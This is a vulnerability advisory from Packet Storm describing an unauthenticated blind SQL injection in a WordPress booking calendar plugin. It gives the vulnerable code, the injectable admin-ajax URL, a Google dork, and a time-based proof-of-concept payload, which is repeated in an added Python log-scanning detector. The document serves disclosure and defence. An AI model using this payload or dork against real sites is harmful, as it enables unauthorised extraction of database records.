WordPress Booking Calendar Contact Form 1.0.23 Blind SQL Injection

Date: 08 Feb 2016
Reported by: Joaquin Ramirez Martinez
Type: packetstorm
Source: packetstormsecurity.com

Wordpress Booking Calendar Contact Form 1.0.23 Blind SQL Injection in Unauthenticated Use

Code
# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection  
# Date: 2016-02-08  
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form  
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]  
# Vendor Homepage: http://wordpress.dwbooster.com/  
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form  
# Version: 1.0.23  
# Tested on: windows 10 + firefox.   
  
==============  
Description  
==============  
  
Create a booking form with a reservation calendar or a classic contact form, connected to   
a PayPal payment button.  
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a   
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation   
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.  
  
The **reservation calendar** is an optional item, so it can be disabled to create a **general   
purpose contact form**.  
  
There are two types of bookings available in the calendar configuration: full day bookings or   
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial   
day bookings the start and end dates are partially blocked as used for example in   
**room/hotel bookings**.  
  
===================  
Technical details   
===================  
  
The Booking Calendar plugin is prone to a blind SQL injection because it fails to sanitize a  
parameter that is used in a SQL statement.  
The function `dex_bccf_get_option` uses a constant called `CP_BCCF_CALENDAR_ID`, which is not sanitized  
and is used as the value of the `id` parameter of the SQL statement.  
The vulnerable function is called from many other functions, one of which is `dex_bccf_calendar_load2`,  
which sets `CP_BCCF_CALENDAR_ID` with the following code:  
  
```php
$calid = str_replace(TDE_BCCFCAL_PREFIX, "", @$_GET["id"]);
if (!defined('CP_BCCF_CALENDAR_ID') && $calid != '-1')
    define('CP_BCCF_CALENDAR_ID', $calid);
```
  
and then the function `dex_bccf_get_option` is called inside the `dex_bccf_calendar_load2` function:  
  
```php
// ...
$option = dex_bccf_get_option('calendar_overlapped', DEX_BCCF_DEFAULT_CALENDAR_OVERLAPPED);
// ...
```
  
The `dex_bccf_calendar_load2` function is called when the following URL is requested:  
  
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent  
&dex_bccf_calendar_load2=list&id=<SQLI commands>  
  
An unauthenticated attacker can exploit the SQL injection to obtain all records from the database.  
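Because the vulnerable request is an unauthenticated GET to admin-ajax.php with a fixed `action` value, it is easy to spot in web server logs. The following is an added detection example, not code from the advisory or from the plugin: it parses Apache combined-format access log lines (the sample lines are constructed for this example), isolates requests whose `action` is `dex_bccf_calendar_ajaxevent`, and flags any whose `id` parameter is not a plain integer. The numeric-only rule for a legitimate calendar id is an assumption; the plugin strips a `TDE_BCCFCAL_PREFIX` value from the id that the advisory does not spell out, so adjust `SAFE_ID_RE` to whatever ids your deployment actually emits.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (Apache combined format), not real traffic.
# Line 2 carries the advisory's proof-of-concept payload; the others are benign.
SAMPLE_LOG = """\
203.0.113.10 - - [08/Feb/2016:10:01:02 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=list&id=1 HTTP/1.1" 200 512
203.0.113.10 - - [08/Feb/2016:10:01:09 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=list&id=1%20and%20sleep(10) HTTP/1.1" 200 512
203.0.113.11 - - [08/Feb/2016:10:02:00 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 20
203.0.113.12 - - [08/Feb/2016:10:03:00 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=list&id=-1 HTTP/1.1" 200 512
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The AJAX action named in the advisory.
TARGET_ACTION = "dex_bccf_calendar_ajaxevent"

# Assumption: a legitimate calendar id is an (optionally negative) integer.
# Adjust if your deployment sends ids carrying the plugin's TDE_BCCFCAL_PREFIX.
SAFE_ID_RE = re.compile(r"^-?\d+$")


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_id(target):
    """Return the decoded `id` value when a request hits the vulnerable action
    with a non-numeric id; return None for anything else."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if qs.get("action", [None])[0] != TARGET_ACTION:
        return None
    if "id" not in qs:
        return None
    cal_id = qs["id"][0]
    if SAFE_ID_RE.match(cal_id):
        return None
    return cal_id


def scan_log(text):
    """Scan log text and return one alert dict per request with a suspicious id."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        bad = suspicious_id(rec["target"])
        if bad is not None:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "id": bad})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['ip']} suspicious id={alert['id']!r}")
```

The check keys on the decoded `id` rather than on a keyword list, so it also catches payloads that do not contain `sleep`; the trade-off is that any non-integer id raises an alert, which is the right default for a parameter the vendor's fix in 1.0.24 should be sanitizing anyway.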
  
==================  
Proof of concept  
==================  
  
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent  
&dex_bccf_calendar_load2=list&id=1%20and%20sleep(10)  
  
==========  
CREDITS  
==========  
  
Vulnerability discovered by:  
Joaquin Ramirez Martinez [i0 security-lab]  
joaquin.ramirez.mtz.lab[at]gmail[dot]com  
https://www.facebook.com/I0-security-lab-524954460988147/  
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q  
  
  
========  
TIMELINE  
========  
  
2016-02-01 vulnerability discovered  
2016-02-05 reported to vendor  
2016-02-08 released fixed plugin v1.0.24  
2016-02-08 public disclosure  
